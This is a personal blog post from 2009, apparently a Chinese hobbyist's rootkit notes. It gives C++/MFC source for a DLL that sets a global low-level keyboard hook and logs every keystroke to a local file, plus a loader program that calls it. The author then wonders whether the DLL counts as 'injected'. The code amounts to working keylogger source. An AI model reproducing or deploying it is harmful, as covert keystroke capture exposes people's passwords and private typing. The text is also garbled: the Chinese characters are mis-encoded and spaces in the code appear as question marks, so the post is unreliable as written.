Posted on 2009-11-17 21:54
S.l.e!ep.¢% 閱讀(217)
評(píng)論(0) 編輯 收藏 引用 所屬分類(lèi):
RootKit
接著
About ShutDown of Windows(三) 折騰著,沒(méi)多大收獲
Create 了一個(gè) MFC 的DLL
CHookDLLApp?theApp;
HHOOK?g_Hook?=?NULL;
LRESULT?CALLBACK?MyKeyHook(int?code,?WPARAM?wParam,?LPARAM?lParam)
{
#if?(_WIN32_WINNT?<?0x0400)
/*
*?Structure?used?by?WH_KEYBOARD_LL
????*/
????typedef?struct?tagKBDLLHOOKSTRUCT?{
????????DWORD???vkCode;
????????DWORD???scanCode;
????????DWORD???flags;
????????DWORD???time;
????????DWORD???dwExtraInfo;
????}?KBDLLHOOKSTRUCT,?FAR?*LPKBDLLHOOKSTRUCT,?*PKBDLLHOOKSTRUCT;
#endif
????
????PKBDLLHOOKSTRUCT?kbDLLHOOK?=?(PKBDLLHOOKSTRUCT)lParam;
????
????const?char?*info?=?NULL;
????
????if?(wParam?==?WM_KEYDOWN)
????????info?=?"key?down";????
????else?if?(wParam?==?WM_KEYUP)
????????info?=?"key?up";
????else?if?(wParam?==?WM_SYSKEYDOWN)
????????info?=?"sys?key?down";????
????else?if?(wParam?==?WM_SYSKEYUP)
????????info?=?"sys?key?up";
????
????FILE*?f?=?fopen("hook.txt",?"a+");
????
????CString?strLog;
????strLog.Format("%s?-?vkCode?[%04x],?[%c]?scanCode?[%04x]\n",?info,?kbDLLHOOK->vkCode,?kbDLLHOOK->vkCode,?kbDLLHOOK->scanCode);
????
????fwrite(strLog,?1,?strLog.GetLength(),?f);
????fclose(f);
????
????//?always?call?next?hook
????return?CallNextHookEx(g_Hook,?code,?wParam,?lParam);
}??????
void?Hook()
{
????//?TODO:?Add?extra?initialization?here
#ifndef?WH_KEYBOARD_LL
#define?WH_KEYBOARD_LL?13
#endif
????g_Hook?=?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
????
????if(?g_Hook?==?NULL?)
????????AfxMessageBox("Failed?to?Set?Hook");
}
;?HookDLL.def?:?Declares?the?module?parameters?for?the?DLL.
LIBRARY??????"HookDLL"
DESCRIPTION??'HookDLL?Windows?Dynamic?Link?Library'
EXPORTS
????;?Explicit?exports?can?go?here
????Hook?????????@1
Create 了一個(gè)MFC的工程
BOOL?CHookTestDlg::OnInitDialog()
{
????CDialog::OnInitDialog();
????//?Add?"About
"?menu?item?to?system?menu.
????//?IDM_ABOUTBOX?must?be?in?the?system?command?range.
????ASSERT((IDM_ABOUTBOX?&?0xFFF0)?==?IDM_ABOUTBOX);
????ASSERT(IDM_ABOUTBOX?<?0xF000);
????CMenu*?pSysMenu?=?GetSystemMenu(FALSE);
????if?(pSysMenu?!=?NULL)
????{
????????CString?strAboutMenu;
????????strAboutMenu.LoadString(IDS_ABOUTBOX);
????????if?(!strAboutMenu.IsEmpty())
????????{
????????????pSysMenu->AppendMenu(MF_SEPARATOR);
????????????pSysMenu->AppendMenu(MF_STRING,?IDM_ABOUTBOX,?strAboutMenu);
????????}
????}
????//?Set?the?icon?for?this?dialog.??The?framework?does?this?automatically
????//??when?the?application's?main?window?is?not?a?dialog
????SetIcon(m_hIcon,?TRUE);????????????//?Set?big?icon
????SetIcon(m_hIcon,?FALSE);????????//?Set?small?icon
????
????//?TODO:?Add?extra?initialization?here
#ifndef?WH_KEYBOARD_LL
????#define?WH_KEYBOARD_LL?13
#endif
????
//?????g_Hook?=?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
//?????
//?????if(?g_Hook?==?NULL?)
//?????????AfxMessageBox("Failed?to?Set?Hook");
????TCHAR?szPath[MAX_PATH]?=?{0};
????GetModuleFileName(NULL,?szPath,?MAX_PATH);
????PathRenameExtension(szPath,?_T(""));
????typedef?void?(*TYPE_pfnLoadLibrary)();
????TYPE_pfnLoadLibrary?pfnLoadLibrary?=?NULL;
????HMODULE?Module?=?LoadLibrary(szPath);
????pfnLoadLibrary?=?(TYPE_pfnLoadLibrary)GetProcAddress(Module,?"Hook");
????
????pfnLoadLibrary();
????return?TRUE;??//?return?TRUE??unless?you?set?the?focus?to?a?control
}
時(shí)間太緊,沒(méi)做一些異常判斷處理
HOOK成功了,用 SysCheck 工具一看, 只看到了 HookTest.exe 里面加載了一個(gè)HookDLL.dll
采用 injecteddll 工具也沒(méi)有看到所謂的“注入”DLL
是否“注入”成功,不得所知
所謂的“注入”又該怎么看到的呢?明天再解決它。